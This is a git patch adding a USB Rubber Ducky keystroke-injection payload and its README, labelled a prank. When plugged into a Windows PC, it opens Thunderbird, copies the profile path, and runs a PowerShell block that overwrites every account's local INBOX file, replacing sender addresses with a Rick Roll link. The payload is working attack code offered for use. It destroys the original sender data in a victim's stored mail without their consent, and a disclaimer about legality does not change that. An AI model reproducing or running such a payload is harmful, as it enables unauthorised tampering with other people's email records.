From 30c6dd4aa6462776e9c8be0b4d50b69c5cdb0614 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 3 Jun 2024 09:04:17 +0200 Subject: [PATCH 1/2] Prank In The Middle - Thunderbird The name of the payload `Prank In The Middle` is named after the pun Prank + Man In The Middle in that this operation, in some ways, can remotely be configured as a MITM attack but since it was created specifically for playful purposes then here is the reason for the union with the word Prank. I don't know if anyone else has uploaded the same thing in the past, so apologies if it already exists. --- .../Prank_In_The_Middle_Thunderbird/README.md | 168 ++++++++++++++++++ .../payload.txt | 83 +++++++++ 2 files changed, 251 insertions(+) create mode 100644 payloads/library/prank/Prank_In_The_Middle_Thunderbird/README.md create mode 100644 payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/README.md b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/README.md new file mode 100644 index 00000000..71302b67 --- /dev/null +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/README.md @@ -0,0 +1,168 @@ +# Prank In The Middle - Thunderbird + +The name of the payload `Prank In The Middle` is named after the pun Prank + Man In The Middle in that this operation, in some ways, can remotely be configured as a MITM attack but since it was created specifically for playful purposes then here is the reason for the union with the word Prank. + +**Category**: Prank + +**Plug-And-Play** ^^ + +## Index + +- [Description](#description) +- [Requirements](#requirements) +- [How the Program Works](#how-the-program-works) +- [Code Details](#code-details) + - [System Detection && Short Start DELAY](#system-detection--short-start-delay) + - [Navigating in Thunderbird](#navigating-in-thunderbird) + - [Opening PowerShell and Email Manipulation](#opening-powershell-and-email-manipulation) + - [The Regex](#the-regex) +- [Notes](#notes) +- [Credits](#credits) + +## Description + +This program automates a series of actions on a Windows system (*tested on Windows 10 but should works in Windows 11*) to manipulate the contents of emails found in a Thunderbird profile. Specifically, it identifies emails in the `INBOX` file of each configured email account and replaces the sender's email addresses with a fictitious address `Rick.Roll@tinyurl.com/prinkrollme` where `prinkrollme` is the union of the words `Prank`, `Rick Roll` and `Me` (*this one was necessary becouse prinkwoll era già stato preso* **:c** *so sad...* ) all compressed into the link `tinyurl.com/prinkrollme` ([*3° note*](#notes)) that redirect to the YouTube video `https://www.youtube.com/watch?v=xMHJGd3wwZk`. + +![](https://i.ibb.co/VJjfbkJ/1.png) + +## Requirements + +- A Windows system with Thunderbird installed. +- Access to PowerShell. +- Permissions to run code in Powershell + + +## Test Environment + +- Thunderbird 115.11.1 (64 bit) +- Windows 10 Pro + +## How the Program Works + +1. **System Detection:** The program detects if the system reflects the CAPSLOCK state and sets a dynamic delay based on this. +2. **Opening Thunderbird:** Uses a series of commands to open Thunderbird and navigate to the profile folder settings. +3. **Copying the Profile Folder Path:** Copies the profile folder path to the clipboard. +4. **Opening PowerShell:** Opens a PowerShell window and navigates to the `ImapMail` folder of the Thunderbird profile. +5. **Email Manipulation:** Uses PowerShell to: + - Find all `INBOX` folders within `ImapMail`. + - Read the contents of the emails in `INBOX`. + - Replace the sender addresses with `Rick Roll `. + - Save the modified content back to the original email files. + +## Code Details + +### System Detection && Short Start DELAY + +```plaintext +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + ... + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION +``` + +### Navigating in Thunderbird + +```plaintext +WIN r +STRING thunderbird +ENTER +DELAY 1000 +REPEAT 4 TAB +ENTER +DELAY 500 +REPEAT 2 UPARROW +ENTER +DELAY 500 +REPEAT 3 UPARROW +ENTER +DELAY 500 +REPEAT 11 TAB +ENTER +DELAY 500 +REPEAT 4 TAB +SPACEBAR +ENTER +CTRL c +ALT F4 +``` + +### Opening PowerShell and Email Manipulation + +```plaintext +WIN r +STRING powershell +ENTER +DELAY 1500 +STRING cd +CTRL v +ENTER + +STRINGLN + cd ImapMail + $directories = Get-ChildItem -Directory | Select-Object FullName + foreach ($dir in $directories) { + $newPath = $dir.FullName -replace '\\', '/' + $newPath += "/INBOX" + if (Test-Path $newPath) { + $emails = Get-Content -Path $newPath -Raw + $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll " + Set-Content -Path $newPath -Value $modifiedEmails -Force + } + } +END_STRINGLN +DELAY 1000 +ALT F4 +``` + +### The Regex + +The regex was not created from scratch but was taken from the discussion “[How can I validate an email address using a regular expression?](https://stackoverflow.com/questions/201323/how-can-i-validate-an-email-address-using-a-regular-expression)” posted on **StackOverflow**. + +```plaintext +(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\]) +``` + +The only difference is the addition of `**From: <...>**` which reduces to just the email addresses that sent the emails and not all addresses detected in the file that might depict other references + +```plaintext +From:\s.*\s<...> +``` + +## Notes + +1) This program was created for educational and demonstrative purposes. Unauthorized alteration of emails is illegal, and violating others' privacy is a crime. +2) Ensure you have the necessary permissions before running any script that modifies personal or sensitive data. +3) Considering [Staged Payloads](https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#staged-payloads), generally, it is not possible to include code that downloads from external sources. In this case, however, the setup involves a redirect to a YouTube video, which has been conveniently shortened using `tiny.url`. It is important to note that this redirect can be modified, and I strongly recommend changing it to a personal link for your security. While I assure you that I will never alter the link, no one can guarantee that I won't be compromised, allowing someone else to alter the redirect. It is always advisable and a good practice to never use links found online without understanding the actual redirect and replacing it with your own link. + +## Credits + +

Aleff

+
+ + + + + +
+ + + +
Github + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt new file mode 100644 index 00000000..8491a831 --- /dev/null +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -0,0 +1,83 @@ +REM ##################################################### +REM # # +REM # Title : Prank In The Middle - Thunderbird # +REM # Author : Aleff # +REM # Version : 1.0 # +REM # Category : Prank # +REM # Target : Windows 10/11 # +REM # # +REM ##################################################### + +REM Open Thunderbird and goto settings +DELAY 2500 +WIN r +STRING thunderbird +ENTER +DELAY 1000 +REPEAT 4 TAB +ENTER +DELAY 500 +REPEAT 2 UPARROW +ENTER +DELAY 500 +REPEAT 3 UPARROW +ENTER +DELAY 500 + +REM Goto profile directory +REPEAT 11 TAB +ENTER +DELAY 500 + +REM Copy the directory path +REPEAT 4 TAB +DELAY 500 +SPACEBAR +DELAY 500 +ENTER +DELAY 500 +CTRL c +DELAY 500 +ALT F4 +DELAY 500 + +REM Open the powershell and goto the directory +WIN r +STRING powershell +ENTER +DELAY 1500 +STRING cd +DELAY 500 +CTRL v +DELAY 500 +ENTER +DELAY 500 + +REM Get the INBOX content and edit it overwriting. Then close the powershell +STRINGLN_BLOCK + cd ImapMail + $directories = Get-ChildItem -Directory | Select-Object FullName + foreach ($dir in $directories) { + # Replace backslashes with slash + $newPath = $dir.FullName -replace '\\', '/' + + # Add the sub-string “/INBOX” to the end + $newPath += "/INBOX" + + # Check whether the INBOX file exists + if (Test-Path $newPath) { + # Check whether the INBOX file exists + $emails = Get-Content -Path $newPath -Raw + + # Replace email sender with Rick Roll! + # The following operation is simplified and assumes that the sender starts with “From: ...” + # and does not contain complex MIME structures + $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll " + + # Write the modified content into the INBOX file. + Set-Content -Path $newPath -Value $modifiedEmails -Force + } + } +END_STRINGLN +DELAY 1000 +ALT F4 \ No newline at end of file From 06941a5e8cba2ca745fb6779ca3d96e957ec050d Mon Sep 17 00:00:00 2001 From: Aleff Date: Tue, 4 Jun 2024 07:41:20 +0200 Subject: [PATCH 2/2] Update payload.txt --- .../prank/Prank_In_The_Middle_Thunderbird/payload.txt | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index 8491a831..6fc3cb04 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -10,7 +10,7 @@ REM ##################################################### REM Open Thunderbird and goto settings DELAY 2500 -WIN r +GUI r STRING thunderbird ENTER DELAY 1000 @@ -32,7 +32,7 @@ DELAY 500 REM Copy the directory path REPEAT 4 TAB DELAY 500 -SPACEBAR +SPACE DELAY 500 ENTER DELAY 500 @@ -42,7 +42,7 @@ ALT F4 DELAY 500 REM Open the powershell and goto the directory -WIN r +GUI r STRING powershell ENTER DELAY 1500 @@ -61,7 +61,7 @@ STRINGLN_BLOCK # Replace backslashes with slash $newPath = $dir.FullName -replace '\\', '/' - # Add the sub-string “/INBOX” to the end + # Add the sub-string '/INBOX' to the end $newPath += "/INBOX" # Check whether the INBOX file exists @@ -70,7 +70,7 @@ STRINGLN_BLOCK $emails = Get-Content -Path $newPath -Raw # Replace email sender with Rick Roll! - # The following operation is simplified and assumes that the sender starts with “From: ...” + # The following operation is simplified and assumes that the sender starts with 'From: ...' # and does not contain complex MIME structures $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll "